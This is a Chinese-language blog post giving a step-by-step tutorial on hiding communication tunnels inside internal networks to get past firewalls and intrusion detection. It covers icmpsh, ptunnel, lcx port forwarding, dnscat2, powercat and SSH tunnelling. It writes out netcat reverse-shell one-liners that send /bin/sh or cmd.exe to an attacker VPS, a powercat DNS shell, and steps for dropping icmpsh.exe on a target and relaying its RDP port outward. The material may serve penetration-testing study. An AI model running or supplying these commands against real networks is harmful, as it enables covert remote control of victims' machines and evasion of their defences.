

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#447EA5">
  <meta name="author" content="iDea">
  <meta name="keywords" content="">
  
    <meta name="description" content="隐藏通信隧道1.1 隐藏通信隧道基础知识 在实际的网络中，通常会通过各种边界设备、软&#x2F;硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相">
<meta property="og:type" content="article">
<meta property="og:title" content="内网隧道隐藏">
<meta property="og:url" content="http://idea-oss.github.io/2022/06/15/%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93%E9%9A%90%E8%97%8F/%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93%E9%9A%90%E8%97%8F/index.html">
<meta property="og:site_name" content="iDea &#39;blog">
<meta property="og:description" content="隐藏通信隧道1.1 隐藏通信隧道基础知识 在实际的网络中，通常会通过各种边界设备、软&#x2F;硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://idea-oss.github.io/img/%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93%E9%9A%90%E8%97%8F.png">
<meta property="article:published_time" content="2022-06-15T06:02:56.000Z">
<meta property="article:modified_time" content="2022-06-15T06:05:25.857Z">
<meta property="article:author" content="iDea">
<meta property="article:tag" content="内网安全">
<meta property="article:tag" content="隧道隐藏">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://idea-oss.github.io/img/%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93%E9%9A%90%E8%97%8F.png">
  
  
  
  <title>内网隧道隐藏 - iDea &#39;blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"idea-oss.github.io","root":"/","version":"1.9.1","typing":{"enable":true,"typeSpeed":100,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":"https://0mpxzrpw.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>

  
<meta name="generator" content="Hexo 6.2.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 85vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>iDea</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/./img/%E5%86%85%E7%BD%91%E9%9A%A7%E9%81%93%E9%9A%90%E8%97%8F.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.5)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="内网隧道隐藏"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-06-15 14:02" pubdate>
          2022年6月15日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          5.3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          45 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
        <div class="scroll-down-bar">
          <i class="iconfont icon-arrowdown"></i>
        </div>
      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">内网隧道隐藏</h1>
            
            <div class="markdown-body">
              
              <h2 id="隐藏通信隧道"><a href="#隐藏通信隧道" class="headerlink" title="隐藏通信隧道"></a><strong>隐藏通信隧道</strong></h2><p><strong>1.1 隐藏通信隧道基础知识</strong></p>
<p>在实际的网络中，通常会通过各种边界设备、软&#x2F;硬件防火墙甚至入侵检测系统来检查对外连接情况，如果发现异样，就会对通信进行阻断。那么什么是隧道呢？这里的隧道，就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装，然后穿过防火墙，与对方进行通信。当封装的数据包到达目的地时，将数据包还原，并将还原后的数据包发送到相应服务器上。<br>常用的隧道列举如下：</p>
<ul>
<li>网络层：IPv6隧道、IMCP隧道、GRE隧道</li>
<li>传输层：TCP隧道、UDP隧道、常规端口转发</li>
<li>应用层：SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道</li>
</ul>
<p><strong>1.2 判断内网的连通性</strong><br>判断内网的连通性是指判断机器能否上外网等。要综合判断各种协议（TCP、HTTP、DNS、ICMP等)及端口通信的情况。常见的允许流量流出的端口有80、8080、443、53、110、123等。<br>常用的内网连通性判断方法如下</p>
<ul>
<li>ICMP协议</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ping &lt;ip或 域名&gt;<br></code></pre></td></tr></table></figure>

<ul>
<li>TCP协议<br>netcat(简称nc)被誉为网络安全界的“瑞士军刀”，是一个短小精悍的工具，通过使用TCP或UDP协议的网络连接读写数据。</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc  &lt;ip 端口&gt;<br>例如：<br>nc 192.168.1.1 80<br></code></pre></td></tr></table></figure>
<ul>
<li>HTTP协议</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl &lt;ip:端口&gt;<br></code></pre></td></tr></table></figure>
<p>如果远程主机开启了相应的端口，会输出相应的端口信息，如果远程主机没有开启相应的端口，则没有任何提示。</p>
<ul>
<li>DNS协议<br>在进行DNS连通性检测时，常用的命令为nslookup和dig</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nslookup 域名<br></code></pre></td></tr></table></figure>



<p>有一种情况是流量不能直接流出，需要在内网中设置代理服务器，常见于通过企业办公网段上网的场景。常见的判断方法如下。<br>1.查看网络连接，判断是否存在与其他机器8080(不绝对)等端口的连接(可以尝试运行 “ping -n 1 -a ip”)<br>2.查看内网中是否有主机名类似于”proxy”的机器<br>3.查看IE浏览器的直接代理<br>4.根据pac文件的路径(可能是本地路径，也可能是远程路径），将其下载下来并查看。<br>5.执行如下命令，利用curl工具确认</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">curl www.baidu.com   					//不通<br>curl -x proxy-ip:port wwww.baidu.com    //通<br></code></pre></td></tr></table></figure>


<p><strong>2.1 网络层隧道技术</strong></p>
<ul>
<li>ICMP隧道<br>常用工具有：icmpsh、PingTunnel、icmptunnel、powershell icmp等<br>1.icmpsh<br>因为icmpsh工具要代替系统本身的Ping命令的应答程序，所有需要输入如下命令来关闭本地系统的icmp应答（如果需要恢复，设置为0），否则shell的运行不稳定</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">sysctl -w net.ipv4.icmp_echo_ignore_all=1<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210506221022965.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>配置环境服务端：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">yum -y install epel-release<br>yum -y install python-pip<br>pip install --upgrade pip -i https://pypi.tuna.tsinghua.edu.cn/simple<br>pip install Impacket -i https://pypi.tuna.tsinghua.edu.cn/simple<br></code></pre></td></tr></table></figure>

<p>VPS运行：<br><img src="https://img-blog.csdnimg.cn/20210506223126341.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>直接运行run.sh会报错。所以这里运行py的脚本</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">python icmpsh_m.py &lt;vpsIP&gt; &lt;受控端IP&gt;<br></code></pre></td></tr></table></figure>

<p>目标主机运行：<br>将icmpsh.exe扔进目标主机</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">.\icmpsh.exe -t vps主机IP  <br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/2021050622384811.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>结果：<br><img src="https://img-blog.csdnimg.cn/2021050622390638.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>项目地址：<a target="_blank" rel="noopener" href="https://github.com/inquisb/icmpsh">https://github.com/inquisb/icmpsh</a></p>
<ul>
<li>Pingtunnel<br>Pingtunnel也是一款常用的隧道工具。可跨平台使用。为避免隧道被滥用，可以为隧道设置密码</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20210506234735805.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>搭建：下载后解压</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> PingTunnel<br>make &amp;&amp; make install<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210506224727637.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>跳板机运行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ptunnel -x shuteer<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210506225941907.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>攻击机运行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">./ptunnel -p 192.168.112.37 -lp 1080 -da 10.10.10.30 -dp 3389 -x shuteer<br></code></pre></td></tr></table></figure>

<pre><code class="hljs">-lp：指定本地监听的端口

-p 指定ICMP隧道另一端的IP

-da：指定要转发的目标机器的IP

-dp：指定要转发的目标机器的端口

-x：指定连接密码
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/20210506234624153.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>攻击机连接目标3389端口</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">rdesktop -f  192.168.112.254:1080<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210506234915577.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>成功连接到目标机</p>
<p>Pingtunnel工具在windows环境中也可以运行，只不过要在内网的Windows机器上安全wincap类库。</p>
<p><strong>2.2 传输层隧道技术</strong></p>
<ul>
<li>LCX<br>1.内网端口转发<br>lcx工具是一个基于Socket套接字实现的端口转发工具。有windows和Linux两个版本。windows为lcx.exe,liunx版本为portmap。</li>
</ul>
<p>在目标机上执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#将目标机上的3389端口的所有数据转发到公网vps的4444端口上</span><br>lcx.exe  -slave &lt;vps主机地址&gt; 4444  127.0.0.1  3389<br><br>portmap -m 3 -h1 127.0.0.1 -p1 33389 -h2 &lt;vps主机地址&gt; -p2 4444<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210507230736535.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>在vps上执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#将本机 4444端口上监听的所有数据转发到本机的5555端口上</span><br>lcx.exe  -listen 4444 5555<br><br>portmap -m 2 -p1 4444 -h2 &lt;vps主机地址&gt; -p2 5555<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210507230705555.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>结果：<br><img src="https://img-blog.csdnimg.cn/20210507230846339.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>成功访问到目标3389</p>
<p>2.本地端口映射<br>如果目标服务器由于防火墙的限制，部分端口(例如3389)的数据无法通过防火墙，可以将目标服务器相应的端口的数据穿透传到防火墙允许的其他端口(例如53）。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">lcx.exe -tran 53 &lt;目标主机IP地址&gt; 3389<br></code></pre></td></tr></table></figure>

<ul>
<li>netcat<br>常用参数:<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash">-l ： 使用监听模式，管理和控制传入的数据<br>-p : 设置本地主机使用的通信端口<br>-v ： 详细输出<br>-d ：后台模式<br>-e : 程序重定向<br></code></pre></td></tr></table></figure></li>
</ul>
<p>1.获取shell<br>（1）正向shell<br>在目标主机上执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvp 4444 -e /bin/sh    						 //linux<br>nc -lvp 4444 -e c:\windows\system32\cmd.exe      //windows<br></code></pre></td></tr></table></figure>
<p>在vps上执行：<br><img src="https://img-blog.csdnimg.cn/2021050811272211.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc &lt;目标主机IP&gt;  4444<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508112743205.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>（2）.反向shell<br>在目标机上执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc &lt;vps主机IP&gt; 9999 -e /bin/sh      					//linux<br>nc &lt;vps主机IP&gt; 9999 -e c:\windows\system32\cmd.exe      //windows<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508115105804.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>在vps上执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvp 9999<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508115128840.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210508115140193.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>2.nc代理<br>在这里插入图片描述</p>
<p>在kali中访问到10.10.10.12<br>在kali中执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvp 3333<br></code></pre></td></tr></table></figure>
<p>在内网主机中执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -lvp  3333 -e c:\windows\system32\cmd.exe<br></code></pre></td></tr></table></figure>
<p>在web服务器中执行：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">nc -v 192.168.43.254 3333 -c <span class="hljs-string">&quot;nc -v 10.10.10.12 3333&quot;</span><br></code></pre></td></tr></table></figure>
<p>由于我环境问题就不演示了，在实战中也基本不会用到，了解就行了</p>
<p><strong>2.3应用层隧道技术</strong><br>常用的隧道协议有ssh、htto\https和dns。</p>
<ul>
<li>DNS协议:<br>首先，需要知道当前服务器是否允许内部的DNS解析外部的域名，也就是要测试DNS的连通性。<br>输入如下命令查看当前内部域名及IP地址：</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#linux</span><br><span class="hljs-built_in">cat</span> /etc/resolv.conf | grep -v <span class="hljs-string">&#x27;#&#x27;</span><br><span class="hljs-comment">#windows</span><br>nslookup 内部的域名<br></code></pre></td></tr></table></figure>
<p>能够通过内部dns服务器解析外部域名，这意味着可以使用DNS隧道隐蔽通信。<br>（1）dnscat2<br>dnscat2工具的服务端是由ruby语言编写，而客户端是由c语言编写。现在也有powershell版。<br>它可以用自己的本身的客户端也可以用powercat作为客户端(powecat可以说是nc的powershell版)</p>
<p>使用dnscat2隧道的模式有两种，分别是直连模式和中继模式。</p>
<ul>
<li>直连模式：客户端直接指向IP地址的DNS服务器发起DNS解析请求。</li>
<li>中继模式：DNS经过互联网的迭代解析，指向指定的DNS服务器，与直连相比，中继模式的速度较慢。<br>服务端：</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#启动</span><br>ruby./dnscat2.rb abc.com --secret=123456   <span class="hljs-comment">#方式1【常用】</span><br>ruby./dnscat2.rb --dns server=127.0.0.1,port=53,<span class="hljs-built_in">type</span>=TXT --secret=123456   <span class="hljs-comment">#方式2</span><br>ruby./dnscat2.rb abc.com --secret=123456 --security=open --no-cache   <span class="hljs-comment">#方式3</span><br>ruby ./dnscat2.rb  <span class="hljs-comment">#方式4</span><br></code></pre></td></tr></table></figure>

<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment">#命令详解</span><br>-c : 加密通信<br>-e ：规定安全级别，<span class="hljs-string">&#x27;open&#x27;</span>表示服务端允许客户端不进行加密<br>--no-cache : 禁止缓存。<br></code></pre></td></tr></table></figure>

<p><img src="https://img-blog.csdnimg.cn/20210508133139221.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<p>客户端:</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash">dnscat --secret=123456 abc.com    <span class="hljs-comment">#对应 方式1、3</span><br>dnscat --dns server=&lt;your dnscat2 server ip&gt;,port=553,<span class="hljs-built_in">type</span>=TXT   <span class="hljs-comment">#对应 方式2，注意使用--dns选项时，port不可省，否则可能连不上</span><br>./dnscat --dns=server=192.168.43.254,port=53 <span class="hljs-comment">#对应方式4</span><br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508132522708.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>结果：<br>可以看见已经接收到一个session<br><img src="https://img-blog.csdnimg.cn/20210508133218338.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210508133323687.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210508133349437.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20210508133413114.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ2ODA0NTUx,size_16,color_FFFFFF,t_70" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>在这里就可以执行命令操作了<br>（2）dnscat+powercat<br>客户端：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">Import-Module .\powercat.ps1<br>powercat -c 192.168.43.254 -p 53 -dns aaa.com -e cmd.exe<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508134519124.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>服务端：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash">ruby dnscat2.rb aaa.com -e open --no-cache<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/20210508134537265.png" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>收到session</p>
<p>powercat 也可像nc哪像使用，使用方法都差不多。</p>
<p>详细学习请参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/localhost01/article/details/86591685">https://blog.csdn.net/localhost01/article/details/86591685</a></p>
<ul>
<li>ssh协议：<br>创建ssh隧道的常用参数：</li>
</ul>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash">-C ： 压缩传输，提高传输速度。<br>-f ： 将ssh传输转入后台执行，不占用当前的shell。<br>-N ：建立默认连接（建立了连接，但是看不到具体会话）。<br>-g ：允许远程主机连接本地用于转发的端口。<br>-L : 本地端口转发。<br>-R ： 远程端口转发。<br>-D ： 动态转发(socks代理）。<br>-P ：指定ssh端口。<br></code></pre></td></tr></table></figure>
